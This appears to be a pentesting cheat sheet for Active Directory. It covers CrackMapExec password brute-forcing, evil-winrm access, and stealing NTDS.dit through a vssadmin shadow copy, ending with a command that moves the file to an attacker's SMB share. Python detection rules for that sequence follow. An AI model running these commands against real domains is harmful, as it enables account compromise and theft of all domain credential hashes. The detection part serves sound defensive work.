Dictionary Attacks against AD accounts using CrackMapExec
Creating a Custom list of Usernames
Username Anarchy
# Installation - <https://github.com/urbanadventurer/username-anarchy>
# Usage, names.txt contains usernames that we have gathered during information gathering
./username-anarchy -i names.txt
Launching the Attack with CrackMapExec
# Brute forcing against valid username
crackmapexec smb ip -u bwilliamson -p /usr/share/wordlists/fasttrack.txt
Capturing NTDS.dit
# Connecting to a DC with Evil-WinRM with valid user/pass
evil-winrm -i ip -u eren -p pas
# Checking Local Group Membership
net localgroup
# Checking User Account Privileges including Domain
net user eren
# Creating Shadow Copy of C:
vssadmin CREATE SHADOW /For=C:
# Copying NTDS.dit from the VSS
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
# Transferring NTDS.dit to Attack Host using smbserver
cmd.exe /c move C:\NTDS\NTDS.dit \\attackerip\CompData
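
Detection side of the Capturing NTDS.dit sequence above, as an added example that is not part of the original page: Python that scans process-creation command lines for the shadow-copy, copy and move stages and alerts when one account on one host hits two or more of them. The event tuples, host names, the 192.0.2.10 address and the rule names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample events: (host, user, command line), the fields a
# process-creation log export would typically be reduced to.
SAMPLE_EVENTS = [
    ("DC01", "eren", r"net localgroup"),
    ("DC01", "eren", r"vssadmin CREATE SHADOW /For=C:"),
    ("DC01", "eren", r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit"),
    ("DC01", "eren", r"cmd.exe /c move C:\NTDS\NTDS.dit \\192.0.2.10\CompData"),
    ("WS07", "alice", r"vssadmin list shadows"),
    ("FS02", "backup", r"cmd.exe /c copy C:\reports\q1.xlsx \\fs01\share"),
]

# Hypothetical rule names, one per stage of the sequence on this page.
RULES = {
    "shadow_copy_created": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_read_from_shadow": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I),
    "ntds_sent_to_unc": re.compile(r"\b(copy|move)\b.*ntds\.dit\s+\\\\[^\\?\s]+\\", re.I),
}


def detect_ntds_theft(events, min_stages=2):
    """Return {(host, user): sorted rule names} for accounts that hit
    at least min_stages distinct stages on the same host."""
    hits = defaultdict(set)
    for host, user, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits[(host, user)].add(name)
    # A single stage is noisy on its own (backup software also creates
    # shadow copies), so only correlated stages raise an alert.
    return {key: sorted(names) for key, names in hits.items()
            if len(names) >= min_stages}


if __name__ == "__main__":
    for (host, user), stages in detect_ntds_theft(SAMPLE_EVENTS).items():
        print(f"ALERT {host} {user}: {', '.join(stages)}")
```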